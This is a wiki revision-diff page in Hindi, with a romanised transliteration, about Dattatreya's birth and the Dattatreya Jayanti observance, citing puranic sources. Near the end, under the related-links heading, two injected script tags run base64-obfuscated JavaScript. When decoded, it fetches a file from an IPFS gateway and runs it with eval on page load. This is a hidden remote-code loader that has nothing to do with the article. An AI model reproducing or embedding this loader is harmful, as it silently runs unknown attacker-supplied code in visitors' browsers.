Difference between revisions of "दत्तात्रेय जन्म"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
Line 3: Line 3:
 
*[[अत्रि]] की पत्नी [[अनसूया]] ने उन्हें 'दत्त' नाम दिया (क्योंकि देवों के पुत्र के रूप में उन्हें दिया था) तथा वे अत्रि के पुत्र थे। अतः उनका नाम दत्तात्रेय पड़ा।<ref>निर्णयसिन्धु (210); स्मृतिकौस्तुभ (430), वर्षक्रियादीपक (107-108)</ref>  
 
*[[अत्रि]] की पत्नी [[अनसूया]] ने उन्हें 'दत्त' नाम दिया (क्योंकि देवों के पुत्र के रूप में उन्हें दिया था) तथा वे अत्रि के पुत्र थे। अतः उनका नाम दत्तात्रेय पड़ा।<ref>निर्णयसिन्धु (210); स्मृतिकौस्तुभ (430), वर्षक्रियादीपक (107-108)</ref>  
 
*दत्त-भक्ति का प्रचलन अधिकतर [[महाराष्ट्र]] में है और इससे सम्बन्धित स्थान, यथा—औदुम्बर, गणगापुर, नर्सोबावाड़ी महाराष्ट्र में अवस्थित हैं।
 
*दत्त-भक्ति का प्रचलन अधिकतर [[महाराष्ट्र]] में है और इससे सम्बन्धित स्थान, यथा—औदुम्बर, गणगापुर, नर्सोबावाड़ी महाराष्ट्र में अवस्थित हैं।
*दत्तात्रेय ने कार्तवीर्य को वर दिये।<ref>(वनपर्व 115, 12; [[ब्रह्म पुराण]], 13|160-185; [[मत्स्य पुराण]] 43|15-16)</ref>
+
*दत्तात्रेय ने कार्तवीर्य को वर दिये।<ref>वनपर्व 115, 12; [[ब्रह्म पुराण]], 13|160-185; [[मत्स्य पुराण]] 43|15-16)</ref>
 
*वे [[विष्णु]] के अवतार थे।
 
*वे [[विष्णु]] के अवतार थे।
*उन्होंने [[अलर्क]] को योग का सिद्धान्त बतलाया।<ref>(ब्रह्मपुराण 213|106-112; [[मार्कण्डेय पु्राण]] 16|14; ब्रह्माण्ड पुराण 3|8|84)</ref>  
+
*उन्होंने [[अलर्क]] को योग का सिद्धान्त बतलाया।<ref>ब्रह्मपुराण 213|106-112; [[मार्कण्डेय पु्राण]] 16|14; ब्रह्माण्ड पुराण 3|8|84)</ref>  
 
*वे सह्य की घाटियों में रहते थे, अवधूत कहलाते थे, वे मद्य का पान करते थे और स्त्रियों की संगति चाहते थे।<ref>देखिए [[पद्म पुराण]] (2|103|110-112) एवं मार्कण्डेयपुराण (16|132-134)</ref>  
 
*वे सह्य की घाटियों में रहते थे, अवधूत कहलाते थे, वे मद्य का पान करते थे और स्त्रियों की संगति चाहते थे।<ref>देखिए [[पद्म पुराण]] (2|103|110-112) एवं मार्कण्डेयपुराण (16|132-134)</ref>  
 
*तमिल पंचांगों में प्रकट होता है कि दत्तात्रेय-जयन्ती तमिल में भी मनायी जाती है।
 
*तमिल पंचांगों में प्रकट होता है कि दत्तात्रेय-जयन्ती तमिल में भी मनायी जाती है।

Revision as of 12:13, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh ki poornamasi par yah vrat hota hai.
  • atri ki patni anasooya ne unhean 'datt' nam diya (kyoanki devoan ke putr ke roop mean unhean diya tha) tatha ve atri ke putr the. atah unaka nam dattatrey p da.[1]
  • datt-bhakti ka prachalan adhikatar maharashtr mean hai aur isase sambandhit sthan, yatha—audumbar, ganagapur, narsobava di maharashtr mean avasthit haian.
  • dattatrey ne kartaviry ko var diye.[2]
  • ve vishnu ke avatar the.
  • unhoanne alark ko yog ka siddhant batalaya.[3]
  • ve sahy ki ghatiyoan mean rahate the, avadhoot kahalate the, ve mady ka pan karate the aur striyoan ki sangati chahate the.[4]
  • tamil panchaangoan mean prakat hota hai ki dattatrey-jayanti tamil mean bhi manayi jati hai.

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. nirnayasindhu (210); smritikaustubh (430), varshakriyadipak (107-108)
  2. vanaparv 115, 12; brahm puran, 13|160-185; matsy puran 43|15-16)
  3. brahmapuran 213|106-112; markandey puhran 16|14; brahmand puran 3|8|84)
  4. dekhie padm puran (2|103|110-112) evan markandeyapuran (16|132-134)